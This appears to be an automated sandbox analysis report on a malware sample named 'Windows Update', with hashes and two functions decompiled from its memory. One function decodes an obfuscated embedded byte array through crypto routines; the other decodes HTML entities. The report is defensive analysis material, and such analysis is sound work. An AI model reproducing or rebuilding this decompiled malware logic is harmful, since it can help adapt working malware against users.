                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110359352.0000000000112000.00000040.00000001.sdmp, Offset: 00112000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_112000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25eb779820ac1f186cf20854e193e059aabbb3dd725b9a3520c68d6f46559e5c
                                                                                  • Instruction ID: e7610a20dac7a2efab79dfa91336df78c7d817e21d77dd36470f320c6a802dd2
                                                                                  • Opcode Fuzzy Hash: 25eb779820ac1f186cf20854e193e059aabbb3dd725b9a3520c68d6f46559e5c
                                                                                  • Instruction Fuzzy Hash: 34D05E343106818FDB19CA0CC294F9973E4BB44700F0644F8FC108B266C3B8ECD0D600
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 00EEB1E6, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E00EEB1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E00EF105D(_a4 + 4);
				_push(_t178);
				L00F2B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E00EF105D(_a4);
				_push(_t180);
				L00F2B581();
				if(_t180 == 0) {
					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E00EF105D(_a4);
				_push(_t182);
				L00F2B581();
				if(_t182 == 0) {
					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E00EF105D(_a4);
				_push(_t184);
				L00F2B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L00F2B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L00F2B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E00EEC860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E00EF118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L00F2B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E00EEC860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

























































































































































                                                                                  0x00eeb1f8
                                                                                  0x00eeb1fa
                                                                                  0x00eeb1ff
                                                                                  0x00eeb205
                                                                                  0x00eeb208
                                                                                  0x00eeb20d
                                                                                  0x00eeb20e
                                                                                  0x00eeb215
                                                                                  0x00eeb21a
                                                                                  0x00eeb22b
                                                                                  0x00eeb22b
                                                                                  0x00eeb233
                                                                                  0x00eeb238
                                                                                  0x00eeb23d
                                                                                  0x00eeb23e
                                                                                  0x00eeb247
                                                                                  0x00eeb258
                                                                                  0x00eeb258
                                                                                  0x00eeb260
                                                                                  0x00eeb265
                                                                                  0x00eeb26a
                                                                                  0x00eeb26b
                                                                                  0x00eeb274
                                                                                  0x00eeb285
                                                                                  0x00eeb285
                                                                                  0x00eeb28d
                                                                                  0x00eeb292
                                                                                  0x00eeb297
                                                                                  0x00eeb298
                                                                                  0x00eeb2a1
                                                                                  0x00eeb744
                                                                                  0x00eeb744
                                                                                  0x00eeb2a7
                                                                                  0x00eeb2a7
                                                                                  0x00eeb2aa
                                                                                  0x00eeb2ad
                                                                                  0x00eeb2b0
                                                                                  0x00eeb2b7
                                                                                  0x00eeb2be
                                                                                  0x00eeb2c5
                                                                                  0x00eeb2cc
                                                                                  0x00eeb2d3
                                                                                  0x00eeb2da
                                                                                  0x00eeb2e1
                                                                                  0x00eeb2e8
                                                                                  0x00eeb2ef
                                                                                  0x00eeb2f6
                                                                                  0x00eeb2fd
                                                                                  0x00eeb304
                                                                                  0x00eeb30b
                                                                                  0x00eeb312
                                                                                  0x00eeb319
                                                                                  0x00eeb320
                                                                                  0x00eeb327
                                                                                  0x00eeb32e
                                                                                  0x00eeb335
                                                                                  0x00eeb33c
                                                                                  0x00eeb343
                                                                                  0x00eeb34a
                                                                                  0x00eeb351
                                                                                  0x00eeb358
                                                                                  0x00eeb35f
                                                                                  0x00eeb366
                                                                                  0x00eeb36d
                                                                                  0x00eeb374
                                                                                  0x00eeb37b
                                                                                  0x00eeb382
                                                                                  0x00eeb389
                                                                                  0x00eeb390
                                                                                  0x00eeb397
                                                                                  0x00eeb39e
                                                                                  0x00eeb3a5
                                                                                  0x00eeb3ac
                                                                                  0x00eeb3b3
                                                                                  0x00eeb3ba
                                                                                  0x00eeb3c1
                                                                                  0x00eeb3c8
                                                                                  0x00eeb3cf
                                                                                  0x00eeb3d6
                                                                                  0x00eeb3dd
                                                                                  0x00eeb3e4
                                                                                  0x00eeb3eb
                                                                                  0x00eeb3f2
                                                                                  0x00eeb3f9
                                                                                  0x00eeb400
                                                                                  0x00eeb407
                                                                                  0x00eeb40d
                                                                                  0x00eeb414
                                                                                  0x00eeb41b
                                                                                  0x00eeb422
                                                                                  0x00eeb429
                                                                                  0x00eeb430
                                                                                  0x00eeb437
                                                                                  0x00eeb43e
                                                                                  0x00eeb445
                                                                                  0x00eeb44c
                                                                                  0x00eeb453
                                                                                  0x00eeb45a
                                                                                  0x00eeb461
                                                                                  0x00eeb468
                                                                                  0x00eeb46f
                                                                                  0x00eeb476
                                                                                  0x00eeb47d
                                                                                  0x00eeb484
                                                                                  0x00eeb48b
                                                                                  0x00eeb492
                                                                                  0x00eeb499
                                                                                  0x00eeb4a0
                                                                                  0x00eeb4a7
                                                                                  0x00eeb4ae
                                                                                  0x00eeb4b5
                                                                                  0x00eeb4bc
                                                                                  0x00eeb4c3
                                                                                  0x00eeb4ca
                                                                                  0x00eeb4d1
                                                                                  0x00eeb4d6
                                                                                  0x00eeb4dd
                                                                                  0x00eeb4de
                                                                                  0x00eeb4e5
                                                                                  0x00eeb4ec
                                                                                  0x00eeb4f3
                                                                                  0x00eeb4fa
                                                                                  0x00eeb501
                                                                                  0x00eeb508
                                                                                  0x00eeb50f
                                                                                  0x00eeb516
                                                                                  0x00eeb51d
                                                                                  0x00eeb524
                                                                                  0x00eeb52b
                                                                                  0x00eeb532
                                                                                  0x00eeb539
                                                                                  0x00eeb540
                                                                                  0x00eeb547
                                                                                  0x00eeb54e
                                                                                  0x00eeb555
                                                                                  0x00eeb55c
                                                                                  0x00eeb563
                                                                                  0x00eeb56a
                                                                                  0x00eeb571
                                                                                  0x00eeb578
                                                                                  0x00eeb57f
                                                                                  0x00eeb586
                                                                                  0x00eeb58d
                                                                                  0x00eeb594
                                                                                  0x00eeb59b
                                                                                  0x00eeb5a2
                                                                                  0x00eeb5a9
                                                                                  0x00eeb5b0
                                                                                  0x00eeb5b7
                                                                                  0x00eeb5be
                                                                                  0x00eeb5c5
                                                                                  0x00eeb5cc
                                                                                  0x00eeb5d3
                                                                                  0x00eeb5da
                                                                                  0x00eeb5e1
                                                                                  0x00eeb5e8
                                                                                  0x00eeb5ef
                                                                                  0x00eeb5f6
                                                                                  0x00eeb5fd
                                                                                  0x00eeb604
                                                                                  0x00eeb60b
                                                                                  0x00eeb612
                                                                                  0x00eeb619
                                                                                  0x00eeb620
                                                                                  0x00eeb627
                                                                                  0x00eeb62e
                                                                                  0x00eeb635
                                                                                  0x00eeb63c
                                                                                  0x00eeb64c
                                                                                  0x00eeb64d
                                                                                  0x00eeb64e
                                                                                  0x00eeb651
                                                                                  0x00eeb652
                                                                                  0x00eeb653
                                                                                  0x00eeb65b
                                                                                  0x00eeb65c
                                                                                  0x00eeb66e
                                                                                  0x00eeb66f
                                                                                  0x00eeb671
                                                                                  0x00eeb67c
                                                                                  0x00eeb682
                                                                                  0x00eeb68f
                                                                                  0x00eeb696
                                                                                  0x00eeb6bb
                                                                                  0x00eeb704
                                                                                  0x00eeb704
                                                                                  0x00eeb70c
                                                                                  0x00eeb720
                                                                                  0x00eeb72b
                                                                                  0x00eeb72b
                                                                                  0x00eeb731
                                                                                  0x00eeb735
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eeb73a
                                                                                  0x00eeb6bd
                                                                                  0x00eeb6c5
                                                                                  0x00eeb6cc
                                                                                  0x00eeb6cd
                                                                                  0x00eeb6db
                                                                                  0x00eeb6f4
                                                                                  0x00eeb6fb
                                                                                  0x00eeb702
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eeb702

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                  • API String ID: 0-140969752
                                                                                  • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction ID: 914f08c56f4a1d6e57066e572a3d242751288c567baeb7ac2231c872b83ac2df
                                                                                  • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction Fuzzy Hash: 03F1E1209087EDC9DB32C6788C097DDBEA45B23324F0843D9D1A87A2D2D7B54BC58B66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F4E67A, Relevance: 57.8, Strings: 46, Instructions: 307COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 80%
                                                                                  			E00F4E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr* _t200;
				char* _t202;
				signed int _t203;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				char _t215;
				intOrPtr _t216;
				short _t219;
				signed int _t224;
				intOrPtr* _t225;
				intOrPtr _t230;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t238;
				signed int _t239;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;
				void* _t249;

				_v64 = 0x413f68;
				_v60 = 0x413f70;
				_v56 = 0x413f74;
				_v52 = 0x413f78;
				_v48 = 0x413f80;
				_v44 = 0x413f88;
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = 0x413f90;
				_v464 = 0x413f98;
				_v460 = 0x413fa0;
				_v456 = 0x413fa8;
				_v452 = 0x413fb0;
				_v448 = 0x413fb8;
				_v444 = 0x413fc0;
				_v440 = 0x413fc8;
				_v436 = 0x413fd0;
				_v432 = 0x413fd8;
				_v428 = 0x413fe0;
				_v424 = 0x413fe8;
				_v420 = 0x413ff0;
				_v416 = 0x413ff8;
				_v412 = 0x414000;
				_v408 = 0x414008;
				_v404 = 0x414010;
				_v400 = 0x414018;
				_v396 = 0x414020;
				_v392 = 0x414028;
				_v388 = 0x414030;
				_v384 = 0x414038;
				_v380 = 0x414040;
				_v376 = 0x414048;
				_v372 = 0x414050;
				_v368 = 0x414058;
				_v364 = 0x414060;
				_v360 = 0x414068;
				_v356 = 0x414070;
				_v352 = 0x414078;
				_v348 = 0x414080;
				_v344 = 0x414088;
				_v340 = 0x414090;
				_v336 = 0x414098;
				_v332 = 0x4140a0;
				_v328 = 0x4140a8;
				_v324 = 0x4140b0;
				_v320 = 0x4140b8;
				_v316 = 0x4140c0;
				_v312 = 0x4140c8;
				_v308 = 0x4140d0;
				_v304 = 0x4140d8;
				_v300 = 0x4140e0;
				_v296 = 0x4140e8;
				_v292 = 0x4140f0;
				_v288 = 0x4140f8;
				_v284 = 0x414100;
				_v280 = 0x414108;
				_v276 = 0x414110;
				_v272 = 0x414118;
				_v268 = 0x414120;
				_v264 = 0x414128;
				_v260 = 0x414130;
				_v256 = 0x414138;
				_v252 = 0x414140;
				_v248 = 0x414148;
				_v244 = 0x414150;
				_v240 = 0x414158;
				_v236 = 0x414160;
				_v232 = 0x414168;
				_v228 = 0x414170;
				_v224 = 0x414178;
				_v220 = 0x414180;
				_v216 = 0x414188;
				_v212 = 0x414190;
				_v208 = 0x414198;
				_v204 = 0x4141a0;
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t224 = 0;
				_t247 = 0;
				_v200 = 0x4141a8;
				_v196 = 0x4141b0;
				_v192 = 0x4141b8;
				_v188 = 0x4141c0;
				_v184 = 0x4141c8;
				_v180 = 0x4141d0;
				_v176 = 0x4141d8;
				_v172 = 0x4141e0;
				_v168 = 0x4141e8;
				_v164 = 0x4141f0;
				_v160 = 0x4141f8;
				_v156 = 0x414200;
				_v152 = 0x414208;
				_v148 = 0x414210;
				_v144 = 0x414218;
				_v140 = 0x414220;
				_v136 = 0x414228;
				_v132 = 0x414230;
				_v128 = 0x414238;
				_v124 = 0x414240;
				_v120 = 0x414248;
				_v116 = 0x414250;
				_v112 = 0x414258;
				_v108 = 0x414260;
				_v104 = 0x414268;
				_v100 = 0x414270;
				_v96 = 0x414278;
				_v92 = 0x414280;
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t224;
					 *_t202 = 0;
					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t247) {
					_t225 = _t247 + _t200;
					_t203 =  *_t225;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t224 + _a4)) = _t203;
							_t224 = _t224 + 1;
						} else {
							if(_t224 != _v28) {
								 *((char*)(_t224 + _a4)) = 0x20;
								_t224 = _t224 + 1;
								if(_a20 != 0 && _t224 == 1) {
									_t224 = 0;
								}
							}
							_v28 = _t224;
						}
						_t247 = _t247 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t247 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t242 = 0;
					_v36 = _t225 + 1;
					while(1) {
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						L00F503B6();
						_push(_t203);
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						_v8 = _t203;
						_push(_v36);
						L00F504AE();
						_t249 = _t249 + 0x10;
						if(_t203 == 0) {
							break;
						}
						_t242 = _t242 + 1;
						if(_t242 < 6) {
							continue;
						}
						_t207 = _a8;
						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
								_push(_t209);
								_v40 = _t209;
								L00F503B6();
								_t243 = _t209;
								_push(_t243);
								_push(_v40);
								_push(_v36);
								L00F504AE();
								_t249 = _t249 + 0x10;
								if(_t209 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
							_t224 = _t224 + 1;
							_t247 = _t247 + _t243 + 1;
							goto L43;
						}
						_t128 = _t207 + 2; // 0x2
						_t244 = _t247 + _t128;
						_t230 =  *_t244;
						if(_t230 == 0x78 || _t230 == 0x58) {
							_t159 = _t207 + 3; // 0x3
							_t238 = _t247 + _t159;
							_t231 = _t238;
							_t245 = 0;
							while(1) {
								_t212 =  *_t231;
								if(_t212 == 0) {
									break;
								}
								if(_t212 == 0x3b) {
									L27:
									if(_t245 <= 0) {
										goto L29;
									}
									_push(_t245);
									_push(_t238);
									_push( &_v88);
									L00F5043C();
									 *((char*)(_t248 + _t245 - 0x54)) = 0;
									_t215 = E00F45384( &_v88,  &_v88);
									_t249 = _t249 + 0x10;
									 *((char*)(_t224 + _a4)) = _t215;
									_t224 = _t224 + 1;
									_t247 = _t247 + _t245 + 4;
									goto L43;
								}
								_t245 = _t245 + 1;
								if(_t245 >= 4) {
									break;
								}
								_t231 = _t231 + 1;
							}
							_t245 = _t245 | 0xffffffff;
							goto L27;
						} else {
							_t233 = _t244;
							_t239 = 0;
							while(1) {
								_t216 =  *_t233;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									_v8 = _t239;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									L00F5043C();
									 *((char*)(_t248 + _v8 - 0x48)) = 0;
									_t219 =  &_v76;
									L00F50430();
									_t249 = _t249 + 0x10;
									_v32 = _t219;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
									 *((char*)(_t224 + _a4)) = _v12;
									_t224 = _t224 + 1;
									_t247 = _t247 + _v8 + 3;
									goto L43;
								}
								_t239 = _t239 + 1;
								if(_t239 >= 6) {
									break;
								}
								_t233 = _t233 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
					_t224 = _t224 + 1;
					_t247 = _t247 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}
















































































































































                                                                                  0x00f4e685
                                                                                  0x00f4e68c
                                                                                  0x00f4e693
                                                                                  0x00f4e69a
                                                                                  0x00f4e6a1
                                                                                  0x00f4e6a8
                                                                                  0x00f4e6af
                                                                                  0x00f4e6b3
                                                                                  0x00f4e6b7
                                                                                  0x00f4e6bb
                                                                                  0x00f4e6bf
                                                                                  0x00f4e6c3
                                                                                  0x00f4e6c7
                                                                                  0x00f4e6d1
                                                                                  0x00f4e6db
                                                                                  0x00f4e6e5
                                                                                  0x00f4e6ef
                                                                                  0x00f4e6f9
                                                                                  0x00f4e703
                                                                                  0x00f4e70d
                                                                                  0x00f4e717
                                                                                  0x00f4e721
                                                                                  0x00f4e72b
                                                                                  0x00f4e735
                                                                                  0x00f4e73f
                                                                                  0x00f4e749
                                                                                  0x00f4e753
                                                                                  0x00f4e75d
                                                                                  0x00f4e767
                                                                                  0x00f4e771
                                                                                  0x00f4e77b
                                                                                  0x00f4e785
                                                                                  0x00f4e78f
                                                                                  0x00f4e799
                                                                                  0x00f4e7a3
                                                                                  0x00f4e7ad
                                                                                  0x00f4e7b7
                                                                                  0x00f4e7c1
                                                                                  0x00f4e7cb
                                                                                  0x00f4e7d5
                                                                                  0x00f4e7df
                                                                                  0x00f4e7e9
                                                                                  0x00f4e7f3
                                                                                  0x00f4e7fd
                                                                                  0x00f4e807
                                                                                  0x00f4e811
                                                                                  0x00f4e81b
                                                                                  0x00f4e825
                                                                                  0x00f4e82f
                                                                                  0x00f4e839
                                                                                  0x00f4e843
                                                                                  0x00f4e84d
                                                                                  0x00f4e857
                                                                                  0x00f4e861
                                                                                  0x00f4e86b
                                                                                  0x00f4e875
                                                                                  0x00f4e87f
                                                                                  0x00f4e889
                                                                                  0x00f4e893
                                                                                  0x00f4e89d
                                                                                  0x00f4e8a7
                                                                                  0x00f4e8b1
                                                                                  0x00f4e8bb
                                                                                  0x00f4e8c5
                                                                                  0x00f4e8cf
                                                                                  0x00f4e8d9
                                                                                  0x00f4e8e3
                                                                                  0x00f4e8ed
                                                                                  0x00f4e8f7
                                                                                  0x00f4e901
                                                                                  0x00f4e90b
                                                                                  0x00f4e915
                                                                                  0x00f4e91f
                                                                                  0x00f4e929
                                                                                  0x00f4e933
                                                                                  0x00f4e93d
                                                                                  0x00f4e947
                                                                                  0x00f4e951
                                                                                  0x00f4e95b
                                                                                  0x00f4e965
                                                                                  0x00f4e968
                                                                                  0x00f4e96c
                                                                                  0x00f4e96e
                                                                                  0x00f4e972
                                                                                  0x00f4e97c
                                                                                  0x00f4e986
                                                                                  0x00f4e990
                                                                                  0x00f4e99a
                                                                                  0x00f4e9a4
                                                                                  0x00f4e9ae
                                                                                  0x00f4e9b8
                                                                                  0x00f4e9c2
                                                                                  0x00f4e9cc
                                                                                  0x00f4e9d6
                                                                                  0x00f4e9e0
                                                                                  0x00f4e9ea
                                                                                  0x00f4e9f4
                                                                                  0x00f4e9fe
                                                                                  0x00f4ea08
                                                                                  0x00f4ea12
